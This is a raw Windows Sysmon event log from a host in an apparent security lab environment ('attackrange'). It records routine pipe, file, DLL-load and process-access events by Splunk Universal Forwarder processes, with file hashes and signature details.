AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057346075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.888{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.888{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.888{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.888{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057346071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.887{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057346070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:18:09.887{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057346069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.791{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.791{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8622DE87622B1CA73A565E32785D731,SHA256=287AC84DB01A577938C2B24465A781B7B108B1723970281861AB1ACB29957CE5falsetrue 534500x800000000000000057346067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.425{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.425{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057346065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.425{8B6011A9-5B81-618E-48F3-04000000F101}8969392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.425{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057346063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.425{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057346062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.257{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057346061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.257{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16235399325B0282CBB974578B795859,SHA256=341F837762F0882610353837CCA9E14E9CF73A4CD26B7B822CA7F26FE557A1DCfalsetrue 734700x800000000000000057346060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057346059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057346058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057346057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057346055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057346054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.241{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057346050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057346049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057346046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057346045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057346044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057346042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057346040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057346036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057346034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057346033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057346032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057346031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057346030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057346029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057346028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057346027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057346026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057346025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057346024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057346023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057346022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057346021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:09.226{8B6011A9-5B81-618E-48F3-04000000F101}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057346020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 